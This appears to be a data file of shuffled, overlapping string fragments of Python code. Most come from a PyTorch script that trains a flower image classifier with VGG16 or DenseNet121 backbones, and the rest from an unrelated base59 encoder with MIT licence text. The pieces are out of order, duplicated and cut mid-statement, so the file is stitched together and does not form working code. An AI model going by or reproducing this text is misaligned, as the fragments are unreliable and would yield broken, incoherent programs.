Fallback to default epochs: 1') epochs = 1 print('Training", "is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No). Default", "device): ''' Prints validation accuracy of model ''' correct = 0 total =", "(Y for Yes; N for No). Default is Y.') args = parser.parse_args() return(args)", "import OrderedDict import os import argparse # Functions def arg_parser(): ''' Takes in", "= 'cpu' print('Using CPU') else: print('Incorrect Value for GPU entered.') print('Fallback to default", "learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate", "ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader, valid_loader,", "for Neural Network training. Default is 1.') parser.add_argument('--gpu', type=str, help='Use GPU (Y for", "Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc = 0 for", "('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier =", "CPU') else: print('Using GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens", "inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs =", "dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a", "= classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer)", "models, transforms from collections import OrderedDict import os import argparse # Functions def", "= arg_parser() if args.gpu: gpu=args.gpu else: print('No input given. 
Fallback to default GPU:", "0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir,", "= epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx':", "parser.add_argument('--gpu', type=str, help='Use GPU (Y for Yes; N for No). Default is Y.')", "bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer =", "of model ''' correct = 0 total = 0 with torch.no_grad(): model.eval() for", "based on the parameter. Also handles most edge-cases. Returns the device variable to", "Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16 and densenet121", "labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every == 0: model.eval()", "Imports import pandas as pd import numpy as np import torch from torch", "Network. Default is 1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default", "Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for", "Returns all six datasets and loaders, in the same order. ''' train_dir =", "gpu, dropout, hidden, learning_rate. Returns a torch model. 
''' if architecture: if architecture=='vgg16':", "architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def", "torch.device('cuda' if torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else:", "np import torch from torch import nn from torch import optim import torch.nn.functional", "''' valid_loss = 0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader):", "(inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss", "transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456,", "datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid']) } dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True),", "total = 0 with torch.no_grad(): model.eval() for data in test_loader: images, labels =", "and loaders, in the same order. ''' train_dir = data_dir + '/train' valid_dir", "inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate", "print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model to the", "transforms from collections import OrderedDict import os import argparse # Functions def arg_parser():", "64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'],", "Python functions. 
''' parser = argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from", "accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data,", "torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100", "Dropout layers. Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default", "if hidden: hidden = hidden else: print('No number of hidden inputs specified. Fallback", "device variable to be used later. ''' if gpu=='Y': device = torch.device('cuda' if", "= round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs,", "Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network.", "given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs", "1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given.", "= 0 valid_acc = 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels", "our Neural Network model ''' steps = 0 if epochs: epochs = epochs", "Validation function for our model. Returns validation loss and accuracy. ''' valid_loss =", "and validation. Also loads dataloaders for all three in the same order. Returns", "handles most edge-cases. Returns the device variable to be used later. 
''' if", "= 25088 if hidden: hidden = hidden else: print('No number of hidden inputs", "torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss", "{}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!')", "parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16 and densenet121 supported.')", "= 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main def main(): args", "labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 * correct / total,", "nn from torch import optim import torch.nn.functional as F import torch.utils.data from torchvision", "transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']),", "if epochs: epochs = epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(),", "loaders, in the same order. 
''' train_dir = data_dir + '/train' valid_dir =", "valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps =", "epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps = 0 if", "for data in test_loader: images, labels = data images, labels = images.to(device), labels.to(device)", "to {}!'.format(file)) # Main def main(): args = arg_parser() if args.gpu: gpu=args.gpu else:", "== ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion, optimizer, train_loader,", "round(float(valid_loss/len(valid_loader)), 3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} ::", "torch.cuda.is_available() else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU')", "No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data", "the model to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs", "device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion,", "total += labels.size(0) correct += (predicted == labels).sum().item() accuracy = round(100 * correct", "if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif gpu=='N': device", "Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training", "3) valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation", "'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]) } image_datasets = {", "args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU: 1') gpu='Y' device", "test and validation. 
Also loads dataloaders for all three in the same order.", "inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item() ps = torch.exp(output) equality", "== labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy)) def", "the same order. ''' train_dir = data_dir + '/train' valid_dir = data_dir +", "accuracy of model ''' correct = 0 total = 0 with torch.no_grad(): model.eval()", "loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every", "('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier model.to(device) criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(),", "transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]), 'valid': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(),", "in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. ''' if architecture:", "else: print('No learning_rate specified. Fallback to default learning_rate: 0.001') learning_rate = 0.001 if", "model ''' correct = 0 total = 0 with torch.no_grad(): model.eval() for data", "''' Loads data for train, test and validation. Also loads dataloaders for all", "type=str, help='Use GPU (Y for Yes; N for No). Default is Y.') args", "''' Saves the model to the given path. ''' model.class_to_idx = train_data.class_to_idx if", "GPU') return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu,", "from collections import OrderedDict import os import argparse # Functions def arg_parser(): '''", "model. 
''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True) model.name = architecture input_", "= hidden else: print('No number of hidden inputs specified. Fallback to default inputs:", "0.05') dropout = 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier =", "print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'') else: print('No architecture given. Fallback to", "predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted == labels).sum().item() accuracy", "return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based", "def load(data_dir='./flowers'): ''' Loads data for train, test and validation. Also loads dataloaders", "correct = 0 total = 0 with torch.no_grad(): model.eval() for data in test_loader:", "validation. Also loads dataloaders for all three in the same order. Returns all", "0.406], [0.229, 0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir,", "epochs: epochs = epochs else: epochs = 1 checkpoint = {'state_dict': model.state_dict(), 'classifier':", "Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs for Neural Network training. Default is 1.')", "= 1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to", "= 0.001 if dropout: dropout = dropout else: print('No dropout specified. 
Fallback to", "train_loader, valid_loader, device, epochs=1, print_every=50): ''' Trains our Neural Network model ''' steps", "train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer = build(device,", "hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader,", "0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is 1024.') parser.add_argument('--dropout',", "model.eval() for data in test_loader: images, labels = data images, labels = images.to(device),", "ii, (inputs, labels) in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device)", "Training Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs,", "to the given path. ''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs", ":: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train()", "hidden, learning_rate. Returns a torch model. ''' if architecture: if architecture=='vgg16': model =", "gpu=args.gpu else: print('No input given. Fallback to default GPU: 1') gpu='Y' device =", "Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for our Neural Network. Default is", "epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model training complete!') return(model) def", "with torch.no_grad(): model.eval() for data in test_loader: images, labels = data images, labels", "valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' data_transforms = {'train':", "type=float, help='Dropout value for our Dropout layers. 
Default is 0.05.') parser.add_argument('--epochs', type=int, help='Epochs", "import torch from torch import nn from torch import optim import torch.nn.functional as", "arg_parser(): ''' Takes in command-line arguments and parses them for usage of our", "if args.gpu: gpu=args.gpu else: print('No input given. Fallback to default GPU: 1') gpu='Y'", "print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True) model.name =", "model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss = criterion(outputs, labels)", "argparse # Functions def arg_parser(): ''' Takes in command-line arguments and parses them", "else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') elif", "= data images, labels = images.to(device), labels.to(device) outputs = model(images) _, predicted =", "''' Trains our Neural Network model ''' steps = 0 if epochs: epochs", "train_data, test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden,", "1024 if learning_rate: learning_rate = learning_rate else: print('No learning_rate specified. Fallback to default", "Neural Network model ''' steps = 0 if epochs: epochs = epochs else:", "0.406], [0.229, 0.224, 0.225])]), 'test': transforms.Compose([transforms.RandomResizedCrop(224), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])])", "Rate for our Neural Network. Default is 0.001.') parser.add_argument('--hidden', type=int, help='Hidden Units for", "architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns", "data for train, test and validation. Also loads dataloaders for all three in", "loss and accuracy. ''' valid_loss = 0 valid_acc = 0 for ii, (inputs,", "set_device(gpu): ''' Sets the device based on the parameter. 
Also handles most edge-cases.", "test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485,", "model. Returns validation loss and accuracy. ''' valid_loss = 0 valid_acc = 0", "file) print('Model saved to {}!'.format(file)) # Main def main(): args = arg_parser() if", "epochs, 'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) #", "2) print('Accuracy: {}'.format(accuracy)) def save(model, train_data, epochs, architecture): ''' Saves the model to", "to default epochs: 1') epochs = 1 print('Training Model for {} epochs'.format(epochs)) for", "\\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model = models.vgg16(pretrained=True)", "device based on the parameter. Also handles most edge-cases. Returns the device variable", "dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model, train_loader=train_loader, valid_loader=valid_loader, device=device, criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model,", "Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss = 0 model.train() print('Model", "inputs.to(device), labels.to(device) model.zero_grad() # Forward and backward passes outputs = model.forward(inputs) loss =", "0 total = 0 with torch.no_grad(): model.eval() for data in test_loader: images, labels", "test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate)", "False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden,", 
"print('Model training complete!') return(model) def validate(model, test_loader, device): ''' Prints validation accuracy of", "'architecture': architecture} file = 'checkpoint.pth' torch.save(checkpoint, file) print('Model saved to {}!'.format(file)) # Main", "image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu): ''' Sets the device based on the parameter.", "dataloaders = { 'train': torch.utils.data.DataLoader(image_datasets['train'], 64, shuffle=True), 'test': torch.utils.data.DataLoader(image_datasets['test'], 32, shuffle=True), 'valid': torch.utils.data.DataLoader(image_datasets['valid'],", "''' model.class_to_idx = train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1", "0.001') learning_rate = 0.001 if dropout: dropout = dropout else: print('No dropout specified.", "test_loader, valid_loader, train_data, test_data, valid_data = load() model, criterion, optimizer = build(device, architecture=args.architecture,", "= 0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1',", "Network model ''' steps = 0 if epochs: epochs = epochs else: print('No", "hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier", "specified. Fallback to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate =", "= 0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device)", "model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct += (predicted ==", "architecture): ''' Saves the model to the given path. ''' model.class_to_idx = train_data.class_to_idx", "= architecture input_ = 1024 else: print('Invalid input: Please use \\'vgg16\\' or \\'densenet121\\'')", "most edge-cases. Returns the device variable to be used later. 
''' if gpu=='Y':", "nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102, bias=True)), ('output', nn.LogSoftmax(dim=1)) ])) model.classifier = classifier", "data_dir + '/valid' test_dir = data_dir + '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5),", "validation(model, valid_loader, criterion, device) training_loss = round(float(running_loss/print_every), 3) valid_loss = round(float(valid_loss/len(valid_loader)), 3) valid_acc", "'valid': torch.utils.data.DataLoader(image_datasets['valid'], 32, shuffle=True) } return(dataloaders['train'], dataloaders['test'], dataloaders['valid'], image_datasets['train'], image_datasets['test'], image_datasets['valid']) def set_device(gpu):", ":: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc))", "to default GPU: 1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data,", "else 'cpu') if device=='cpu': print('CUDA not available; using CPU') else: print('Using GPU') return(device)", "torch.no_grad(): model.eval() for data in test_loader: images, labels = data images, labels =", "to default inputs: 1024') hidden = 1024 if learning_rate: learning_rate = learning_rate else:", "Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss, valid_acc)) running_loss =", "{}/{} :: Training Loss: {} :: Validation Loss: {} :: Validation Accuracy: {}'", "from torchvision import datasets, models, transforms from collections import OrderedDict import os import", "load() model, criterion, optimizer = build(device, architecture=args.architecture, dropout=args.dropout, hidden=args.hidden, learning_rate=args.learning_rate) model = train(model=model,", "criterion=criterion, optimizer=optimizer, epochs=args.epochs) validate(model=model, test_loader=test_loader, device=device) save(model=model, train_data=train_data, 
epochs=args.epochs, architecture = args.architecture) if", "0.05 for parameter in model.parameters(): parameter.requires_grad = False classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_,", "criterion = nn.NLLLoss() optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate) return(model, criterion, optimizer) def validation(model, valid_loader,", "1024.') parser.add_argument('--dropout', type=float, help='Dropout value for our Dropout layers. Default is 0.05.') parser.add_argument('--epochs',", "{} :: Validation Loss: {} :: Validation Accuracy: {}' .format(e+1, epochs, training_loss, valid_loss,", "Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. ''' if", "entered.') print('Fallback to default GPU: 1') device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')", "import numpy as np import torch from torch import nn from torch import", "} image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid': datasets.ImageFolder(valid_dir, transform=data_transforms['valid'])", "for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output =", "def set_device(gpu): ''' Sets the device based on the parameter. Also handles most", "criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps % print_every == 0:", "0.224, 0.225])]) } image_datasets = { 'train': datasets.ImageFolder(train_dir, transform=data_transforms['train']), 'test': datasets.ImageFolder(test_dir, transform=data_transforms['test']), 'valid':", "learning_rate. Returns a torch model. 
''' if architecture: if architecture=='vgg16': model = models.vgg16(pretrained=True)", "= train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1 checkpoint =", "print_every=50): ''' Trains our Neural Network model ''' steps = 0 if epochs:", "1') gpu='Y' device = set_device(gpu) train_loader, test_loader, valid_loader, train_data, test_data, valid_data = load()", "argparse.ArgumentParser(description='ImageClassifier Params') parser.add_argument('--architecture', type=str, help='Architecture and model from torchvision.models as strings: vgg16 and", "torch import nn from torch import optim import torch.nn.functional as F import torch.utils.data", "for e in range(epochs): running_loss = 0 for ii, (inputs, labels) in enumerate(train_loader):", "F import torch.utils.data from torchvision import datasets, models, transforms from collections import OrderedDict", "'/train' valid_dir = data_dir + '/valid' test_dir = data_dir + '/test' data_transforms =", "architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture input_ = 1024 else: print('Invalid input:", "(predicted == labels).sum().item() accuracy = round(100 * correct / total, 2) print('Accuracy: {}'.format(accuracy))", "''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model. 
'''", "checkpoint = {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file", "return(device) def build(device, architecture='vgg16', dropout=0.05, hidden=1024, learning_rate=0.001): ''' Takens in architecture, gpu, dropout,", "= {'state_dict': model.state_dict(), 'classifier': model.classifier, 'class_to_idx': model.class_to_idx, 'epochs': epochs, 'architecture': architecture} file =", "outputs = model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if", "in enumerate(train_loader): steps += 1 inputs, labels = inputs.to(device), labels.to(device) model.zero_grad() # Forward", "= (labels.data == ps.max(dim=1)[1]) valid_acc += equality.type(torch.FloatTensor).mean() return valid_loss, valid_acc def train(model, criterion,", "args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads data for train, test and", "classifier = nn.Sequential(OrderedDict([ ('fc1', nn.Linear(input_, hidden)), ('relu', nn.ReLU()), ('dropout1', nn.Dropout(dropout)), ('fc2', nn.Linear(hidden, 102,", "for Yes; N for No). Default is Y.') args = parser.parse_args() return(args) def", "variable to be used later. ''' if gpu=='Y': device = torch.device('cuda' if torch.cuda.is_available()", "valid_acc = round(float(valid_acc/len(valid_loader)), 3) print('Epoch: {}/{} :: Training Loss: {} :: Validation Loss:", "enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output = model.forward(inputs) valid_loss += criterion(output, labels).item()", "import torch.nn.functional as F import torch.utils.data from torchvision import datasets, models, transforms from", "0 for ii, (inputs, labels) in enumerate(valid_loader): inputs, labels = inputs.to(device), labels.to(device) output", "epochs: epochs = epochs else: print('No epochs specified. 
Fallback to default epochs: 1')", "= model.forward(inputs) loss = criterion(outputs, labels) loss.backward() optimizer.step() running_loss += loss.item() if steps", "train_data.class_to_idx if epochs: epochs = epochs else: epochs = 1 checkpoint = {'state_dict':", "numpy as np import torch from torch import nn from torch import optim", "dropout specified. Fallback to default dropout: 0.05') dropout = 0.05 for parameter in", "loads dataloaders for all three in the same order. Returns all six datasets", "model = models.vgg16(pretrained=True) model.name = architecture input_ = 25088 elif architecture=='densenet121': model =", "print_every == 0: model.eval() with torch.no_grad(): valid_loss, valid_acc = validation(model, valid_loader, criterion, device)", "def validate(model, test_loader, device): ''' Prints validation accuracy of model ''' correct =", "or \\'densenet121\\'') else: print('No architecture given. Fallback to default architecture: \\'vgg16\\'') model =", "using CPU') else: print('Using GPU') elif gpu=='N': device = 'cpu' print('Using CPU') else:", "of hidden inputs specified. Fallback to default inputs: 1024') hidden = 1024 if", "labels.to(device) outputs = model(images) _, predicted = torch.max(outputs.data, 1) total += labels.size(0) correct", "learning_rate=0.001): ''' Takens in architecture, gpu, dropout, hidden, learning_rate. Returns a torch model.", "= 0 if epochs: epochs = epochs else: print('No epochs specified. Fallback to", "for No). Default is Y.') args = parser.parse_args() return(args) def load(data_dir='./flowers'): ''' Loads", "+ '/test' data_transforms = {'train': transforms.Compose([transforms.RandomResizedCrop(224), transforms.RandomVerticalFlip(0.5), transforms.RandomRotation(75), transforms.ToTensor(), transforms.Normalize([0.485, 0.456, 0.406], [0.229,", "= architecture input_ = 25088 elif architecture=='densenet121': model = models.densenet121(pretrained=True) model.name = architecture" ]
[ "= v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk <", "while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue", "TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.", "in self.translate: o = ord(a) i = self.decoder[o] if i < self.base: x", "reversed(result))) def chksum(self, v): \"\"\"Get checksum character for BaseX encoded string\"\"\" if not", "self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded", "EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,", "the Software without restriction, including without limitation the rights # to use, copy,", "to standard output.\"\"\" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__)", "ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN", "argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data')", "person obtaining a copy # of this software and associated documentation files (the", ">= self.base: raise ValueError(\"Invalid character\") decimal = decimal * self.base + i sum_chk", "sum_chk = (self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk]", "= argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode", "b59decode, }[(args.decode, args.check)] data = args.file.read().rstrip(b'\\n') try: result = fun(data) except Exception as", "not isinstance(v, bytes): raise TypeError(\"a bytes-like object is required, not '%s'\" % type(v).__name__)", "self.base + i sum_chk += i sumsz += 1 sum_chk += sumsz +", "= 0 sum_chk = 0 sumsz = 
0 for char in v: o", "A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR", "SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #", "result + self.alphabet[sum_chk] def decode_int(self, v): \"\"\"Decode a BaseX encoded string as an", "i < self.base: x = i else: self.decoder[o] = x def encode_int(self, i,", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies", "if i < 0: continue if i >= self.base: raise ValueError(\"Invalid character\") decimal", "[self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] =", "acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v):", "above copyright notice and this permission notice shall be included in # all", "sum_chk % self.base def encode(self, v): \"\"\"Encode a string using BaseX\"\"\" if not", "default_one=True): \"\"\"Encode an integer using BaseX\"\"\" if not i and default_one: return self.alphabet[0]", "+ sumsz / self.base return decimal, sum_chk % self.base def decode(self, v): \"\"\"Decode", "i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk +=", "\"\"\"BaseX encode or decode FILE, or standard input, to standard output.\"\"\" import sys", "2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted, free", "is hereby granted, free of charge, to any person obtaining a copy #", "Dubalu LLC. All rights reserved. 
# # Permission is hereby granted, free of", "i sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz /", "persons to whom the Software is # furnished to do so, subject to", "sum_chk % self.base def decode(self, v): \"\"\"Decode a BaseX encoded string\"\"\" if not", "conditions: # # The above copyright notice and this permission notice shall be", "INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A", "sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE", "OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,", "documentation files (the \"Software\"), to deal # in the Software without restriction, including", "p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base", "return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def", "translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base]", "to permit persons to whom the Software is # furnished to do so,", "= fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result =", "ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT,", "or substantial portions of the Software. 
